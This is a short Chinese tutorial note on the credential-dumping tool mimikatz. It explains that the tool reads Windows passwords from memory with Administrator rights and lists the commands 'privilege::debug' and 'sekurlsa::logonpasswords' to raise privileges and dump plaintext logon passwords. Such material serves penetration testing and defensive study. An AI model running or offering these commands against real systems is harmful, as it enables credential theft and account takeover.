github地址

mimikatz 是一个小工具,可以查看到windows加载进内存的密码数据,首先最起码要使用Administrator权限启动

依次执行:

从administrator提升到system

1
privilege::debug  

获取明文密码

1
sekurlsa::logonpasswords